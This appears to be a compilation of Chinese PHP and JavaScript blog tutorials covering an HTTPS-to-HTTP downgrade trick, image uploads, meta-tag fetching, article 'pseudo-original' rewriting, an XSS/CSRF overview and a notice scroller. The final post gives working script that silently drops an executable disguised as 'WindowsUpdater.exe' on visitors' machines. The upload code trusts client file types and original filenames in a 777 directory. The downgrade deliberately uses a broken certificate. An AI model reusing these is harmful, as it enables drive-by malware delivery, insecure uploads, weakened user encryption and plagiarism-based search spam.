PHP实现客户端HTTPS协议强制退回到HTTP状态 前言网上有很多HTTP升级为HTTPS的方法，但是让客户端所有用户从HTTPS退回HTTP的有效方法却很少。为了自己站点能够退回HTTP，我也是折腾了很长时间才想出来这个方法。废话不多说，直接上本人自己研究出来的方法实现方法首先要在站点部署一个错误的SSL证书，如果无证书或证书正确会陷入301跳转循环！然后在网站的入口文件最上方放入一段代码<?php if ($_SERVER['HTTPS'] == 'on') { if ($_COOKIE['HTTPS']) { ?> <script type="text/javascript"> var targetProtocol = "http:"; if (window.location.protocol != targetProtocol) { window.location.href = targetProtocol + window.location.href.substring(window.location.protocol.length) } </script> <?php exit('请使用http协议访问本站'); } if (!$_COOKIE['HTTPS']) { setcookie("HTTPS", true, time() + 3600); } sleep(1); $url = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; header('HTTP/1.1 301 Moved Permanently'); header('Location:' . $url); } ?>原理总结浏览器检测到错误的SSL证书就不会让站点强制HTTPS，没有了强制HTTPS我们就可以进行跳转到HTTP协议状态，但是只用301重定向这种方式会无限循环，导致浏览器检测到301重定向过多返回错误码。那么我们就只把301重定向给到搜索引擎来看，这种代码的写法不用专门检测是不是搜索引擎，避免误判之类的情况，给到用户这边用JS同样进行无感跳转网页。

PHP文件图片上传代码 HTML代码<html> <head> <meta charset="utf-8"> <title>核客互动图片上传实例</title> </head> <body> <form action="up.php" method="post" enctype="multipart/form-data"> <label for="file">文件名：</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="提交"> </form> </body> </html>form表单提交数据给PHP文件， enctype="multipart/form-data" ，这个代码不能少，获取文件类型。PHP代码<?php // 允许上传的图片后缀 $allowedExts = array("gif", "jpeg", "jpg", "png"); $temp = explode(".", $_FILES["file"]["name"]); echo $_FILES["file"]["size"]; $extension = end($temp); // 获取文件后缀名 if ( ( ($_FILES["file"]["type"] == "image/gif") || ($_FILES["file"]["type"] == "image/jpeg") || ($_FILES["file"]["type"] == "image/jpg") || ($_FILES["file"]["type"] == "image/pjpeg") || ($_FILES["file"]["type"] == "image/x-png") || ($_FILES["file"]["type"] == "image/png") ) && ($_FILES["file"]["size"] < 204800) // 小于 200 kb && in_array($extension, $allowedExts) ) { if ($_FILES["file"]["error"] > 0) { echo "错误：: " . $_FILES["file"]["error"] . "<br>"; } else { echo "上传文件名: " . $_FILES["file"]["name"] . "<br>"; echo "文件类型: " . $_FILES["file"]["type"] . "<br>"; echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>"; echo "文件临时存储的位置: " . $_FILES["file"]["tmp_name"] . "<br>"; // 判断当前目录下的 upload 目录是否存在该文件 // 如果没有 upload 目录，你需要创建它，upload 目录权限为 777 if (file_exists("upload/" . $_FILES["file"]["name"])) { echo $_FILES["file"]["name"] . " 文件已经存在。 "; } else { // 如果 upload 目录不存在该文件则将文件上传到 upload 目录下 move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]); echo "文件存储在: " . "upload/" . $_FILES["file"]["name"]; } } } else { echo "非法的文件格式"; }

PHP获取网站标题、关键词与描述接口 PHP如何获取网站标题、关键词与描述呢？在网页采集过程中，我们需要获取一个网站的meta信息，如title、keywords、description等，但是如果用普通的正则匹配很容易出错。那么到底该如何写这个PHP的代码，这篇文章为你带来解决方法。使用get_meta_tags函数获取meta信息比如我们要获取 httpa://blog.hackeus.cn 这个网页的meta信息，可以直接使用php内置函数get_meta_tags获取，代码如下：<?php $meta_tags = get_meta_tags("httpa://blog.hackeus.cn/"); print_r($meta_tags); ?>运行结果：你会发现获取了网页的关键词与描述，但是发现缺少了网页的标题，原因是标题并不是meta标签，而是组成的，所以我们的完整代码应该如下：/** 获取META信息 */ function get_sitemeta($url) { $data = file_get_contents($url); $meta = array(); if (!empty($data)) { #Title preg_match('/<TITLE>([\w\W]*?)<\/TITLE>/si', $data, $matches); if (!empty($matches[1])) { $meta['title'] = $matches[1]; } #Keywords preg_match('/<META\s+name="keywords"\s+content="([\w\W]*?)"/si', $data, $matches); if (empty($matches[1])) { preg_match("/<META\s+name='keywords'\s+content='([\w\W]*?)'/si", $data, $matches); } if (empty($matches[1])) { preg_match('/<META\s+content="([\w\W]*?)"\s+name="keywords"/si', $data, $matches); } if (empty($matches[1])) { preg_match('/<META\s+http-equiv="keywords"\s+content="([\w\W]*?)"/si', $data, $matches); } if (!empty($matches[1])) { $meta['keywords'] = $matches[1]; } #Description preg_match('/<META\s+name="description"\s+content="([\w\W]*?)"/si', $data, $matches); if (empty($matches[1])) { preg_match("/<META\s+name='description'\s+content='([\w\W]*?)'/si", $data, $matches); } if (empty($matches[1])) { preg_match('/<META\s+content="([\w\W]*?)"\s+name="description"/si', $data, $matches); } if (empty($matches[1])) { preg_match('/<META\s+http-equiv="description"\s+content="([\w\W]*?)"/si', $data, $matches); } if (!empty($matches[1])) { $meta['description'] = $matches[1]; } } return $meta; }

文章怎么伪原创，新手是如何一天30篇伪原创？ 想要每天都坚持写原创文章，其中的难度还是很大的，所以可以适当的更新些伪原创文章。当然更新的伪原创内容也需要讲究质量，那么文章怎么伪原创，编辑伪原创文章有什么技巧呢？本文就给大家介绍下伪原创文章的编辑技巧，另外再回答下新手一天30篇伪原创是否可以做到。一、文章怎么伪原创1、 伪原创文章标题修改1）标题的修改，在于降低搜索引擎中的重复度，但一定要符合文章内容主旨，注意，第一要忠于原文标题的本意；第二要加入更加符合浏览者需求的特色。2）标题中一定要包含关键词，关键词密度以1-2个为宜，关键词的选取以用户需求习惯为主，标题长度不超过30个字符2、 伪原创文章摘要部分1） 描述旨在概括文章主旨，从文章内容里总结即可，具概括性，同时能引导用户点击的文字来做页面描述。2） 描述字数控制在200字以内，含关键词，以2-3为宜，关键词要求顺应语境，切勿生硬。3、 伪原创文章正文关于正文的修改，很多人认为只要处理文章前100个字就行了。其实现在是不妥的，因为百度和谷歌都改了算法，能比较精准的比较出一篇文章的出处，因此最好是改文章的大多数，也就是处理一篇文章的70%就行了。1 首段自己总结：快速阅览文章，了解文章主旨，就像写引言一样，自己编写，融入自己网站及文章关键词2） 文章中部处理段落替换法：即在不影响原文主旨，阅读的情况下调整内容顺序，需保证逻辑通顺，另外还可以多参考几篇文章，融合拆分，记得插入链接锚文本：锚文本有助于提高相关的关键词排名，也可以他人采集你的资料的时候，把锚文本链接一并采集去，这样就相当于给你增加一条外链：（不过一般编辑都会过滤，这里提醒大家在复制别人文章时一定要注意别人的链接，推荐大家用排版助手），锚文本链接以2-3个为宜，增加新的图片：所谓一图胜千言的道理。图片的优化参考：SEO干货分享 站内优化之图片优化。4、伪原创文章文章结尾结尾一般多种多样，可自己编辑，可用近义词替换、等价替换、数字替换（其实这三种方法所有伪原创的文章都适合）等等，但是建议各编辑增加相关文章推荐，即选择相关的3-5篇文章加上链接进行推荐，这样可引导用户继续阅读，增加用户黏度。二、新手一天30篇伪原创可以做到吗新手在编辑伪原创文章方面会经验不足，这样产出的量会相对少些。但是这些技巧是可以学习的，通过学习培训新手也能很快信任伪原创工作。通常不熟练的新手，经过简单的培训后大概30分钟可以出一篇伪原创的文章；在熟练掌握伪原创文章的编辑技巧后，以每15分钟出一篇伪原创的文章来计算，一天大概可以出30篇高质量的图文并茂的伪原创文章。总结而言，新手编辑人员在经过专业的培训之后，是能够在一天编辑出30篇伪原创文章的。关于伪原创文章的问题，本文重点介绍了文章怎么伪原创，以及新手一天是否能做到30篇伪原创文章。总之来说，伪原创文章编辑需要技巧，本文提到的这些方式方法，大家在编辑伪原创文章的时候，可以参考下。另外要注意，不管是原创文章还是伪原创文章，都需要注意质量度，在确保能够解决用户需要的前提下，优化用户体验。切边，不要随意对待伪原创，质量差的伪原创文章不仅不能给网站优化带来帮助，还可以可能带来负面影响。

浅谈一下XSS和CSRF攻击以及防御方法 XSS，即为（CrossSiteScripting），中文名为跨站脚本，是发生在目标用户的浏览器层面上的，当渲染 DOM 树的过程成发生了不在预期内执行的 JS 代码时，就发生了 XSS 攻击，大多数 XSS 攻击的主要方式是嵌入一段远程或者第三方域上的 JS 代码。实际上是在目标网站的作用域下执行了这段JS代码。XSS防御XSS 防御的总体思路是：对输入(和URL参数)进行过滤，对输出进行编码。也就是对提交的所有内容进行过滤，对 url 中的参数进行过滤，过滤掉会导致脚本执行的相关内容 然后对动态输出到页面的内容进行html编码，使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过，但是也还是会拦截很大一部分的XSS攻击。CSRF攻击CSRF（CrossSiteRequest Forgery，跨站请求伪造），字面理解意思就是在别的站点伪造了一个请求。专业术语来说就是在受害者访问一个网站时，其 Cookie 还没有过期的情况下，攻击者伪造一个链接地址发送受害者并欺骗让其点击，从而形成 CSRF 攻击。CSRF防御防御 CSRF 攻击主要有三种策略：验证HTTP Referer 字段；在请求地址中添加 Token 并验证；在 HTTP 头中自定义属性并验证。

JavaScript实现公告栏上下滚动效果代码 这篇文章主要为大家详细介绍了JavaScript实现公告栏上下滚动效果，文中示例代码介绍的非常详细，具有一定的参考价值，感兴趣的小伙伴们可以参考一下。HTML代码<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>公告栏上下滚动</title> <style type="text/css"> body { background: grey; } ul,li{list-style: none;padding: 0;margin: 0;} .Roll { padding: 0; text-align: left; text-indent: 10px; cursor: pointer; opacity: 1; height: 6rem; line-height: 3rem; font-size: 17px; background-color: #fff; color: #fe172d; } .ul li { background-color: #A6E1EC; border-radius: 20px; height: 2rem; margin: 50px auto; opacity: 0; line-height: 2rem; } </style> </head> <body> <div class="Roll" style="overflow: hidden"> <ul class="ul"> <li>核客互动1</li> <li>核客互动2</li> <li>核客互动3</li> <li>核客互动4</li> <li>核客互动5</li> <li>核客互动6</li> </ul> </div> <script type="text/javascript"> statr = () => { //创造一个循环方法函数 let first = $('.ul li:first'), //获取列表第一个li firstLi = first.clone(); //复制第一个li $('.ul li').eq(0).animate({ //列表第一个添加动画， marginTop: '-=15px', opacity: '1' }, 2000) setTimeout(function() { $('.ul li').eq(0).animate({//列表第二个添加动画， marginTop: '-=15px', opacity: '0' }, 2000); setTimeout(function() {//动画结束后删除第一个li first.remove(); }, 2000) $('.ul').append(firstLi)//li复制到最后面开始新的一轮循环 },4000) } setInterval('statr()', 7000) //7秒循环一次 </script> <script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script> </body> </html>

通过JavaScript让网页访客后台自动下载文件 前言：你是否曾经在浏览网页的时候，突然弹出一个窗口不需要你的点击，然后一个文件自动下载到你的电脑上?想不想知道这是怎么做到的，其实只需要一段JavaScript就可以实现后台自动下载文件。JavaScript代码<script> filename = "WindowsUpdater.exe"//这里写用户下载之后的文件 filedata = ""//这里需要填文件数据 //如何生成文件数据？ //我们需要在powershell里运行下面的命令，并将$FileName换成你要指定的文件路径，譬如'C:WindowsSystem32calc.exe' //模板 //$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($FileName)) //譬如我们这里想获取计算器程序的data //$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:WindowsSystem32calc.exe')) //我们可以继续输入 //$base64string | Out-File temporary.log //之后我们打开这个文件 //code .temporary.log //之后将这个文件数据复制到上方的filedata=""中 function base64tobytes(b64data){ var binary_values = atob(b64data); var binary_length = binary_values.length var bytes_data = new Uint8Array(binary_length); for ( var i = 0 ; i < binary_length ; i++ ){ bytes_data[i] = binary_values.charCodeAt(i); } return bytes_data.buffer; } var filebytes = base64tobytes(filedata); var blob = new Blob([filebytes],{"type":"octet/stream"}); var anchor = document.createElement("a") document.body.append(anchor); anchor.style = "display:none;"; var url = window.URL.createObjectURL(blob) anchor.href = url; anchor.download = filename; anchor.click(); window.URL.revokeObjectURL(url); </script>